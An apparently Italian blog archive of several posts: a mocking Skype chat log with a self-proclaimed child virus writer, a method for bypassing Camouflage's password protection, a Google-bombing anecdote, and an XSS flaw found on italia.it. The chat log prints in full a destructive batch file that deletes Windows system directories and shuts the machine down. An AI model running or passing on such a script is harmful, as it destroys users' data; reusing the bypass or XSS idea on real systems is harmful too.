Un post veloce veloce per proporvi una sorta di indovinello e farvi scoprire una cosa che potrebbe tornarvi utile.

Cosa vedete in quell’immagine? Da che cosa è composto il tutto? A cosa può servire?

Attendo commenti

No related posts.

Appena mi ha aggiunto ho indagato sul contatto e sono giunto alla pagina di un’altra persona che ha avuto a che fare con lui pochi giorni fa. L’url è in uno dei commenti nel log stesso. Ho letto in fretta quella pagina e, capito l’andazzo, ho deciso di reggergli il gioco. È venuta fuori una conversazione ai limiti del paranormale.

Buon divertimento:

12:24:07 – IO: ciao, chi sei?

12:24:41 – LUI: [OMISSIS],ma perchè tu hai quel nome stranissimo sulla barra di skype [SI RIFERISCE A "ギアコモ", SE VISUALIZZATE CORRETTAMENTE I CARATTERI GIAPPONESI.]

12:24:49 – LUI: quanti hanni hai?

12:25:38 – IO: sarebbe il mio nome in giapponese

12:25:47 – IO: ma perché mi hai aggiunto?

12:26:03 – LUI: perchè ti ho trovato sulle skypecast

12:26:13 – LUI: tu che sistema operativo usi?

12:26:28 – IO: ma che domande sono?

12:27:23 – LUI: volevo solo trovare nuovi contatti ,vedi da me non funzionano più le skypecast,tu sai cosa sono?

12:27:41 – IO: no, uso pochissimo Skype

12:28:21 – LUI: ma tu hai provato a chiamarmi?

12:28:31 – LUI: ce l’hai la webcamera? [AH, QUESTO GERGO TECNICO!]

12:29:10 – IO: ho provato per sbaglio proprio perché non avevo riconfigurato Skype affinché, con un doppio click su di un contatto, attivasse la chat piuttosto che la chiamata

12:29:11 – LUI: vabbè non fa niente

12:29:35 – LUI: diventiamo amici?

12:29:45 – IO: non cerco amici così in chat

12:31:46 – LUI: vedo che posso anche inviarti SMS

12:31:52 – LUI: tramite skype

12:32:33 – LUI: a proposito io ho dodici anni e vendo antivirus su skype [QUI INIZIA AD ESSERE DAVVERO MOOOLTO CREDIBILE :O]

12:33:10 – IO: mi sembra una cosa alquanto bizzarra

12:33:20 – LUI: desideri una soluzione antivirus?

12:33:31 – IO: non ho alcun problema di virus

12:33:39 – LUI: ma hai un antivirus?

12:33:55 – IO: no, perché non posso praticamente avere problemi di virus

12:33:56 – LUI: o un antispyware o roba del genere?

12:34:08 – LUI: e il firewall lo vuoi

12:34:14 – IO: no, tranquillo, tutto apposto così

12:34:29 – LUI: VABBENE (y)

12:34:54 – IO: ma perché mai proponi queste cose?

12:36:24 – LUI: sono interessato alla sicurezza completa del computer degli altri utenti e io li ricerco su skype a posta per dar loro soluzioni antivirus [UN BENEFATTORE DI 12 ANNI...]

12:36:54 – IO: ma non hai altro da fare a 12 anni?

12:37:12 – LUI: ad esempio?

12:37:57 – LUI: e io cambio degli antivirus, anche i più potenti,mi faccio dare i soldi e tanti!!

12:38:20 – IO: hai davvero dei clienti?

12:38:23 – LUI: si!

12:38:38 – LUI: ho ricevuto anche il presidente della Microsoft [CONTINUA AD ESSERE SEMPRE PIÙ CREDIBILE]

12:38:57 – LUI: a proposito,mi sai dare informazioni su di lui? [MA COME? SE LO HAI "RICEVUTO"!]

12:39:39 – LUI: o non sai niente?!

12:39:53 – IO: se l’hai ricevuto non lo conosci?

12:40:29 – LUI: no ma gli ho dato un antivirus,lo spyware terminator, e poi lui se ne è andato [DI FRONTE ALLO SPYWARE TERMINATOR CHI POTREBBE RESISTERE?]

12:41:11 – IO: non sei particolarmente credibile

12:41:39 – LUI: ma tu sai almeno il suo nome? [ANDIAMO BENE...]

12:41:54 – LUI: io ho visto scritto sul suo nome skype kkanon [INFORMAZIONE ESTREMAMENTE UTILE]

12:42:08 – LUI: ma non mi dice assolutamente niente

12:42:34 – IO: ma se l’hai ricevuto perché non sai il suo nome?

12:43:15 – LUI: ma che ne so io,lui si è preso lo spyware terminator e quando ho cominciato a fargli domande lui si è disconnesso

12:43:20 – LUI: da skype

12:43:41 – IO: e come facevi a sapere che fosse davvero lui?

12:44:15 – LUI: non so chi sia, ci siamo mandati qualche messaggio chat e non ci siamo proprio visti in faccia tramite webcam

12:45:01 – IO: e allora non vedo come tu possa affermare che fosse il “presidente” della M$

12:46:12 – LUI: perchè è l’unica cosa che mi ha detto,se sai qualcosa su di lui,sputa il rospo immediatamente,devo riavviare il pc perchè ho ricevuto e installato gli aggiornamenti automatici ["SPUTA IL ROSPO"? MICA SONO UNA SPIA SOTTO INTERROGATORIO]

12:46:36 – IO: se stai parlando del nuovo presidente è Steve Ballmer

12:46:53 – LUI: Chi è Steve Ballmer [ANDIAMO SEMPRE MEGLIO...]

12:47:20 – LUI: ho capito lascia perdere,tanto lo so che non mi crederai mai! [IN EFFETTI, È UNA STORIA ESTREMAMENTE CREDIBILE, CONOSCENDO STEVE BALLMER]

12:47:23 – LUI: ciao!

12:47:25 – IO: lui: http://it.wikipedia.org/wiki/Steve_Ballmer

12:47:39 – IO: beh, con le prove che mi porti è dura crederti

12:48:11 – LUI: solo io so solo questo di lui

12:48:32 – LUI: e l’antivirus me lo ha pagato 56,23€ [MA CHE CAZZO DI PREZZO È?]

12:48:33 – IO: cosa sai di lui?

12:48:40 – LUI: so il nome skype

12:48:48 – LUI: e basta

12:49:49 – IO: ma non avevi parlato di un anti-spyware prima?

12:49:55 – LUI: si

12:50:07 – IO: e non è gratuito?

12:50:16 – LUI: no

12:50:47 – IO: da quel che vedo presso http://www.spywareterminator.com/download/download.aspx mi risulta sia gratuito (vedi in alto a sinistra)

12:53:01 – LUI: è gratuito,ma io li faccio pagare ad altri utenti quando sono su skype [AH, GRAN BEL COMPORTAMENTO! ]

12:53:19 – IO: e perché fai così?

12:53:23 – LUI: adesso vado a mangiare,aspetta un oretta

12:53:26 – LUI: resta in linea

12:53:32 – IO: sissì

12:53:46 – LUI: io intanto riavvio il pc

12:53:55 – LUI: OK?

12:54:01 – IO: ok, quindi immagino tu abbia Windows

12:54:17 – LUI: perchè tu che computer usi? Macintosh?

12:54:21 – IO: sì

12:54:27 – LUI: bravo

12:54:38 – IO: grazie

13:05:02 – LUI: aspetta,c’è il secondo

13:10:55 – LUI: eccomi qui!

13:11:08 – IO: non dovevi pranzare?

13:11:13 – LUI: ho fatto [MENO MALE CHE AVREBBE DOVUTO METTERCI UN'ORA A MANGIARE]

13:11:32 – LUI: tu che versione di Macintosh hai?

13:11:38 – IO: Leopard

13:11:57 – LUI: Io uso Windows XP Professional SP3

13:12:08 – LUI: invidioso? (envy) [AHAHAHAHAHAHAHAHAHAHAHAH]

13:12:33 – IO: per nulla, preferisco di gran lunga Mac OS X

13:12:47 – LUI: com’è che ti piacciono i macintosh?

13:14:29 – IO: un’interfaccia estremamente ben fatta appoggiata su un sistema operativo UNIX

13:15:12 – LUI: io vorrei vederti in faccia, aspetta che ti faccio una chiamata così ti vedo tramite la webcamera [INIZIO A "PREOCCUPARMI"]

13:15:33 – IO: non ci tengo a farmi vedere

13:15:45 – LUI: perchè? ti vergogni?

13:16:06 – IO: no, ma non ne vedo la necessità

13:18:37 – LUI: ti prego,posso vederti in faccia? [MORBOSO!]

13:18:50 – LUI: sono curioso

13:18:54 – IO: no, perché mai ti interessa tanto?

13:19:36 – LUI: vabbè non fa niente

13:19:41 – IO: meglio

13:20:23 – LUI: volevo informarti che io sono un venditore di antivirus,ma talvolta anche creatore di virus che tengo dentro una penna per sicurezza [GIUSTAMENTE CREA DIRETTAMENTE IL LAVORO, MA SOPRATTUTTO È ATTENTO CONFINANDOLI NELLA "PENNA"!]

13:20:42 – IO: e che sicurezza ti dà la penna?

13:20:58 – LUI: sono isolati dalla rete locale [GRAZIE AL CAZZO...]

13:21:22 – LUI: se li inviassi su Internet mi darebbero addirittura il carcere minorile [NO, PER UNA COSA SIMILE SI VA IN MANICOMIO]

13:21:31 – IO: e dove li provi allora?

13:21:45 – LUI: sul mio computer stesso [APPUNTO, ALLORA NON LI TIENI SOLO SULLA PENNA]

13:22:02 – LUI: scrivo anche applicazioni ingannevoli [AHAHAH, LE APPLICAZIONI "INGANNEVOLI"]

13:22:06 – LUI: come Go Record

13:22:24 – LUI: e strumenti falsi di valutazione della sicurezza come Produkey [AHAHAHA, "STRUMENTI FALSI"? "VALUTAZIONE DELLA SICUREZZA" DI CHE?]

13:22:33 – IO: eh?

13:22:41 – LUI: cieco? [QUESTO NON L'HO CAPITO]

13:22:52 – IO: cosa stai dicendo?

13:23:20 – LUI: non sai che sono le applicazioni ingannevoli e gli strumenti di valutazione della sicurezza

13:23:40 – IO: detto così può voler dir tutto o niente

13:24:35 – LUI: lascia stare, sul tuo profilo c’è scritto che hai 25 anni,e nonostante questo io che ne ho 12 ho più esperienza di te?! [AHAHAH, FENOMENO!]

13:24:57 – IO: considerando ciò che hai detto finora dubito molto

13:25:01 – IO: Produkey mi risulta essere della NirSoft, comunque

13:25:36 – LUI: è uno strumento che mostra i product key delle applicazioni e li cancella rendendo i programmi inutilizzabili

13:26:17 – LUI: se vuoi saperne di più su di me guarda il mio profilo!

13:26:34 – LUI: quello con lo skype messo in tasca [LO "SKYPE MESSO IN TASCA" SAREBBE IL SUO AVATAR, E PROBABILMENTE NELLA SUA MENTE PROFILO ED AVATAR SONO QUASI SINONIMI, BOH]

13:26:36 – IO: quindi http://www.nirsoft.net/utils/product_cd_key_viewer.html sarebbe tuo?

13:26:45 – LUI: si!

13:27:42 – LUI: l’unico antivirus che rileva produkey è il Norton o L’avira

13:28:05 – IO: ma le “produkey” mica sono un qualcosa da dover rilevare

13:28:10 – LUI: se hai produkey ti consiglio di toglierlo

13:28:23 – LUI: se non ci riesci ti spedisco l’avira [ECCO LO SPIRITO DA BENEFATTORE!]

13:28:31 – IO: no, grazie

13:28:38 – LUI: OK!

13:28:47 – IO: quindi lavori per la NirSoft?

13:29:11 – LUI: Si! ma è lavoro nero [SÌ, CERTO...]

13:29:23 – IO: ah, ecco, ora si spiega

13:29:29 – IO: e “Go Record” cosa sarebbe?

13:30:24 – LUI: un applicazione ingannevole che rilascia una copia del trojan skintrim sul pc

13:30:51 – IO: ma cosa intendi con “applicazione ingannevole”?

13:30:54 – LUI: lo sai almeno cos’è un trojan?

13:31:11 – IO: certo

13:32:06 – IO: sarebbe http://www.gorecord.com/ il “Go Record” di cui parli?

13:32:20 – LUI: un applicazione ingannevole fa finta di fare qualcosa di utile sul tuo pc, ma in realtà tutto quello che fa serve a coprire le azioni dei malware che sono dentro di essa

13:32:38 – IO: sissì, so la definizione di trojan

13:33:56 – LUI: e Registry Defender e IE Antivirus li conosci

13:34:33 – IO: no, mai usati

13:37:09 – LUI: Registry Defender fuorviante, è un applicazione ingannevole che mostra dettagli falsi di malware sul pc e tutto quello che mostra che è sano, viene infettato davvero,da virus e spyware,mentre IE antivirus fa finta di ripulire il PC dai virus ma in realtà con la scusa che deve eseguire la registrazione per rimuovere i malware (falsi) che trova sul PC svuota il portafogli del computer [COSA DIAVOLO È IL PORTAFOGLI DEL COMPUTER?]

13:38:00 – LUI: vorresti provarli????????????? (devil)

13:38:18 – IO: tanto non girano su Mac

13:38:39 – LUI: gulp hai ragione!

13:39:01 – LUI: ma la piattaforma Windows XP è l’ideale per queste cose!

13:40:29 – LUI: (mm) e credi che io abbia solo cose del genere? io faccio anche i virus bat per qualsiasi sistema operativo anche per il tuo bel MACINTOSH [MAMMA MIA, I VIRUS BAT NOOO, PAURAAA, CHIAMERÒ BAT-MAN! ]

13:41:16 – LUI: vuoi? che ti mandi [AUTORUN]-autorun filename?? ]:) [QUELLO SAREBBE IL NOME DEL FILE CHE MI HA POI MANDATO]

13:41:36 – IO: i file .bat mi risulta funzionino solo su Windows o MS-DOS comunque

13:42:09 – LUI: facciamo una prova! no? (devil) [STO AL GIOCO, VISTO CHE IMMAGINO MI MANDERÀ LO STESSO FILE INVIATO ALL'ALTRA PERSONA CHE HA AVUTO L'ONORE DI CONOSCERLO]

13:42:26 – IO: ok

13:42:50 – LUI: aspetta un po! (wait)

[A QUESTO PUNTO MI INVIA IL FILE "[Autorun] autorun-filename.bat” CONTENENTE IL SEGUENTE CODICE

@echo off
del C:\
del C:\dos
del C:\windows
del C:\windows\system32
del C:\qemm
del C:\stacker
del C:\norton
del C:\windows\system32
del C:\system32\ logonu1.exe
del C:\windows\system32\restore
del C:\windows\system32\winlogin.exe
del C:\windows
del C:\NVIDIA
del C:\Documents And Settings
dir  /s
shutdown -s -t 10 -c “I am your virus.  I deleted your file because your file because you try to delete me. Dy the way I am Zeus

PER CHI NON HA IDEA DI COSA VOGLIA DIRE, SAPPIA CHE FONDAMENTALMENTE DOVREBBE ELIMINARE LE DIRECTORY PRECEDUTE DAL COMANDO “del” E SPEGNERE IL COMPUTER DOPO DIECI SECONDI MOSTRANDO LA SCRITTA “I am your virus…” (TRA L’ALTRO NON SONO STATE NEMMENO CHIUSE LE VIRGOLETTE ALLA FINE DEL MESSAGGIO). LA TRADUZIONE DEL MESSAGGIO (CORREGGENDO “DY” CON “BY”) SUONEREBBE: “Sono il tuo virus. Ho cancellato il tuo file perché il tuo file perché tu provi a cancellarmi. A proposito, sono Zeus”.

]

13:44:47 – LUI: adesso eseguilo! (angel)

13:45:03 – IO: non posso eseguirlo, considerando che contiene comandi per DOS

13:45:26 – LUI: che figura di m***a! [ALMENO LO RICONOSCE, CURIOSO!]

13:45:44 – IO: ma che significa “Dy the way I am Zeus”?

13:46:35 – LUI: me lo ha chiesto un altro cretino a cui ho inviato il codice del virus! e io non ne so niente perchè questo virus lo creato tramite una guida che gira su Internet [ECCOCI ARRIVATI ALLA CITAZIONE DELL'ALTRA PERSONA, LA CONVERSAZIONE CON LA QUALE È PRESENTE PRESSO QUESTO "BLOG"; SE AVETE PROBLEMI A RAGGIUNGERE LA PAGINA SCARICATE QUESTO FILE.]

13:47:10 – IO: mi sa che voleva scrivere “By the way I am Zeus”

13:48:03 – LUI: invece è esattamente come hai trovato scritto,se lo modifichi il virus non funziona più [QUI SÌ CHE DIMOSTRA DI SAPER DAVVERO PROGRAMMARE, AHAHAH]

13:48:14 – IO: ne dubito fortemente

13:48:43 – LUI: non sto dicendo bugie!!!! (doh)

13:49:19 – IO: è una frase come un’altra, anche se la modifichi non incide sull’esecuzione dello script

13:50:09 – LUI: 8-| e queste cose le faccio soprattutto perchè io sono inteliggentissimo sull’informatica! tu sai fare virus? [SARÀ PUR INTELLIGENTISSIMO *SOPRA* L'ITALIANO?]

13:51:29 – IO: probabilmente sì, ma non mi sono mai cimentato

13:52:00 – LUI: prova a inviarmene uno! ma sta attento a non farlo molto forte, io non ho L’ANTIVIRUS!! [QUALCUNO MI SPIEGA COME SI FA UN VIRUS NON MOLTO FORTE? AHAHAH]

13:52:38 – IO: ma mica si improvvisa così su due piedi e comunque non ho intenzione di farne

13:53:38 – LUI: scusa!

13:58:45 – LUI: allora ci salutiamo?

13:58:58 – LUI: oppure chattiamo ancora un po?

13:59:00 – IO: ora devo andare a mangiare

13:59:35 – LUI: (wave)

13:59:44 – IO: ciao

13:59:51 – LUI: ciao

Sinceramente sono rimasto tra l’allibito e lo sconvolto e non riesco a capire se questo ragazzo (?) “c’è o ci fa”. Trovo tutto così surreale. Voi cosa ne pensate?

Dimenticavo: vi invito a non provare i programmi di cui si è parlato perché esistono e, pur non avendoli provati, credo siano davvero dei malware.

No related posts.

Poiché per l’analisi di altri file ero in vena di guardarli anche con editor esadecimali, quando ho guardato il contenuto di quello ho notato qualcosa di curioso verso la fine del file. Per confermare la vaga intuizione, avevo la necessità di analizzare altri campioni “controllati” di file codificati con tale software, quindi ho utilizzato il software Camouflage su file uguali, ma utilizzando password differenti.

Dall’osservazione dei due file risultanti con un editor esadecimale è risultato lampante il modo con cui viene salvata una versione codificata della password all’interno dei file stessi. Ad ogni carattere della password originale corrisponde un altro carattere codificato con una tecnica ancora non scoperta, ma che, a carattere uguale, fa corrispondere una diversa codifica che si basa solamente sulla posizione del carattere nella password e nessun nesso con gli altri caratteri presenti o con il file criptato.

In particolare i file differivano solamente per la password codificata. Quindi, l’idea per decodificare un file di cui non si conosce la password è estremamente semplice:

• si codifica un file con una password nota e si estrae dal file risultante la password codificata;
• si sostituisce nel file di cui non si conosce la password la password codificata determinata al punto precedente;
• si decodifica il file con la password nota.

Questo è un esempio di come si possa aggirare una protezione così ridicola.

No related posts.

In particolare, se un discreto numero di utenti riesce a trovare un accordo sul contenuto testuale dei link che puntano ad un certo sito è possibile far sì che la ricerca di una parola o di una frase su Google restituisca come primo risultato proprio quel sito!
In questo caso il link che si è voluto creare è stato “<a href=”http://www.italia.it”>merda</a>” (merda) ed infatti in breve tempo si è riusciti ad ottenere il risultato desiderato: oggi su Google.it la ricerca di tale vocabolo restituisce come primo risultato effettivamente quell’obbrobrio di sito, come si può osservare cliccando qui. Forse tra qualche giorno qualcuno interverrà in modo tale da fare sparire quel risultato, ma ad imperitura memoria rimarrà comunque l’immagine proposta sopra .

No related posts.

L’acronimo sta per “Cross-Site Scripting” (la X serve per evitare il conflitto con la sigla CSS, che indica tutt’altro).

È spiegato molto bene, in inglese, qui. Per i più pigri, diciamo che si tratta di inserire codice maligno, solitamente Javascript, in pagine create da altri utenti.

Ciò che si può fare è modificare qualsiasi informazione: nel mio caso le modifiche sono create appositamente in modo sufficientemente macroscopico per essere facilmente notate, ma un lavoro più “di fino” renderebbe i dati modificati assolutamente indistinguibili dagli altri.

Per spiegarvi come è possibile utilizzare in modo pratico questa falla di sicurezza vi propongo semplicemente dei link validi al sito. Se osservate gli URL vedrete che non è un mio sito modificato, ma proprio quello dell’Italia. Naturalmente quanto segue funziona solo al momento in cui è stato scritto questo e si spera che nell’immediato futuro la falla sia chiusa.

1. Primo link, provate a rispondere alla domanda proposta in entrambi i modi e, nel caso rimaniate sul sito, cercate di scovare le 4 modifiche presenti ; nel caso in cui non funzioni più il link si osservi la seguente immagine:
   

   

2. Secondo link, che rende il sito, come dire, più dinamico, se possibile, di quello che è (record personale di incisi in una frase così corta!). In questo caso, se non funzionasse il link, immaginatevi le immagini del sito che danzano per lo schermo.

Capirete quante altre porcate si possano fare e come si possa manipolare l’informazione. Quello che vi ho mostrato è più simpatico che dannoso, ma si fa presto a pensare ad un problema ben più grave: se ci fosse un form di login, sarebbe molto facile redirigere i dati inseriti dagli utenti (username e password) verso di me, attuando ciò che viene denominato phishing.

AGGIORNAMENTO: ieri hanno finalmente hanno corretto questo grossolano bug, comunque potete vedere sempre lo screenshot del primo link .

No related posts.